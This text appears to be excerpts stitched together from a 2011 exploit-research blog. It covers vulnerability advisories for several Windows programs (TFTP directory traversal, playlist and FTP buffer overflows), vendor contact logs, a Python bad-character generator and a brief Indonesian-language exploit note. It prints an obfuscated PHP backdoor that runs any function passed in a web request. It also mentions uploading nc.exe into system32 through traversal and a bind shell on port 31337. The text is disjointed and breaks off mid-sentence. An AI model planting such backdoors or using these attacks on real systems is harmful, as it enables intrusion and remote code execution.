The proof of concept of the vulnerability has been released on December 9, 2011, and no further announcement from CyberLink. I tried to coordinate the issue until they didn’t contact me anymore. A week after our last email, they updated the product, and yes it’s Power2Go 8. How do they know that the product is safe without letting me to check again?
The application itself is still vulnerable to stack buffer overflow as we posted earlier here. This morning, a good friend from Metasploit, mr_me, sent me an email and asking why I didn’t get a shell from this POC. He also attached his working exploit script, and working flawlessly on Windows 7, awesome!
Distinct TFTP Server is part of Distinct Intranet Servers made by Distinct. Corp. Distinct TFTP Server version 3.10 is susceptible to directory traversal attack. Attacker can exploit this vulnerability to retrieve or upload files outside of the TFTP server root directory.
Software Description
From Distinct website:
Distinct Intranet Servers, which includes FTP Server, TFTP, LPD, BOOTP and NFS, bring quality server power to your network with no additional hardware investment. These servers allow you to make use of your PCs to share important services among your users.
Vulnerability Details and Attack Vector
The vulnerability is caused due to improper validation to GET and PUT Request containing dot dot slash (‘../’) sequences, which allows attackers to read or write arbitrary files.
By requesting a dot dot slash within the GET or PUT request, it is possible to retrieve operating system file such as boot.ini or upload file (errh, nc.exe?) to Windows %systemroot% (C:\WINDOWS\system32\).
This is my experience when I was dealing with some applications which have a Directory Traversal vulnerability. I was using DotDotPwn by nitr0us when finding vulnerability on Quickshare File Server 1.2.1 (on the FTP protocol). I also used DotDotPwn when I was doing a pentest on my client. So, let the experience tell you the story.
Quickshare File Server 1.2.1
First, I download the software here, setup the XP lab machine, download DotDotPwn here, and all preparation should be ready. We must setup the Quickshare File Server to point to our FTP directory, let the user set to “Allow anonymous user”.
Aviosoft DTV Player is a multiple format video player application. Aviosoft DTV Player 1.0.1.2 and possibly earlier versions fail to properly handle malformed user-supplied data within a playlist (.plf) file before copying it into an insufficiently sized buffer, resulting in a buffer overflow.
Software Description
Aviosoft DTV Player is a multi-media center combines TV/video/DVD playback, video recording, media converting, FM radios connecting in one intelligent program. Aviosoft DTV Player allows users to watch free-to-air TV shows and analog TV shows. Fully supports TV card with BDA interface, stably run with DVB-T, DVB-S, DVB-S2, ATSC, ISDB-T, ISDB-S, CMMB, DMB-T/H TV-tuner.
Vulnerability Details
The main program AviosoftDTV.exe is prone to a remote memory-corruption vulnerability because the application fails to handle malformed playlist files (.plf). When the program try to load specially-crafted .plf file, it fails to perform boundary checking of the user input file, thus overwriting the Structured Exception Handling chain. This can be bypassed by overwrite the SE Handler address and pass the execution to EIP. Since we can control EIP, arbitrary code can be introduced and lead us to code execution.
Attacker can use this vulnerability to exploit user without prior knowledge via SMB or WebDAV share, instead of bring the specially-crafted file directly.
#HEX Generator
#http://www.digital-echidna.org
#0x04112011
def gene():
c=0
x=0
hslgen='"'
while x <= 255:
hslhex=hex(x)
if c == 16:
hslgen=hslgen+'"\n"'
c=0
if x <= 16:
hslgen=hslgen.replace('0x','\\x0')
hslgen=hslgen+hslhex
x+=1
c+=1
print "\n#Generated with dE HEX Generator"
print "#http://www.digital-echidna.org\n"
print hslgen.replace('0x','\\x')+'"\n'
if __name__ == "__main__":
gene()
It's a useful python script for you.. to find bad chars, when you creating an exploit.
Hi again, we tried to make a universal DEP and ASLR bypass version on BlazeVideo HDTV Player 6.x. This exploit is already public, but we just want to make it universal.
Take a look at mona.py awesome tool developed by corelanc0d3r and his team
So here is the poc, it will bind to port 31337
You might be read about the previous post ScriptFTP Remote BOF, if you are a Metasploit user, you can add this exploit module to your Metasploit Framework.
UPDATE:
Metasploit has released their module for ScriptFTP. You can use it now on Metasploit. Thanks to:
Cyberheb < mrs[at]infosec-id.com >
Otoy < otoy[at]digital-echidna.org >
TecR0c < roccogiovannicalvi[at]gmail.com >
mr_me < steventhomasseeley[at]gmail.com >
Kita akan meng-konversi exploit yang pertama, yaitu Free CD to MP3 Converter. Sebelum itu, kita kumpulkan poin-poin penting yang membuat exploit tersebut berjalan dengan baik, seperti berikut:
Dulu saya melakukan proses exploit Free CD to MP3 Converter pada sistem Windows XP SP3 versi NIST FDCC (Federal Desktop Core Configuration), tapi kali ini saya melakukannya pada sistem Windows XP SP3 versi umum, seharusnya ini tidak akan menjadi masalah berarti karena alamat JMP ESP yang saya gunakan kali ini berasal dari module cdextract.exe.
After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor.
<?
$_="{"; #XOR char
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
well, it’s a quite simple program, it’s just a XOR function over strings. By XOR-ing “<>/” with “{” we have “GET” string as the result.
put the result in one-liner code execution and done.
Another version with “<pre>” tag.
<?
$_="{"; #XOR char
$__=($_^"+").($_^")").($_^">"); #XOR = PRE
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?="<".$__.">".${'_'.$_}["_"](${'_'.$_}["__"]);?>
ScriptFTP client is vulnerable against remote buffer overflow vulnerability. The condition is triggered while processing LIST FTP command with excessive length.
The vulnerability is confirmed in version 3.3. Other version may also be affected.
Software Description
ScriptFTP is a FTP client designed to automate file transfers. It follows the commands written on a text file (also called script file) and makes the uploads or downloads automatically. Writing the script file is very easy, take a look at the script samples section.
Crash/Exploit Information
ScriptFTP follows the commands written on a text file (also called script file). Specifically, processing ScriptFTP with text file/script file contains command GETLIST or GETFILE of 3000 or more bytes of data may trigger an exception within the client, causing it to crash and lead us to stack overflow.
Vendor contacted and responded immediately after our first contact. They are planning to major rewrite but until now, no further info received from them. Do not connect to untrusted FTP server. Fix or update is not available yet, we will update this post if the vendor fix the bug.
Vendor Contact Log:
01/21/2011: Bug found
01/22/2011: Vendor contacted
01/24/2011: Vendor replied
03/07/2011: Update status to vendor
04/06/2011: Vendor received POC
05/17/2011: No further info, 1st reminder sent.
09/11/2011: No further info, 2nd reminder sent.
09/20/2011: No response, advisory released.
awesome tool developed by 
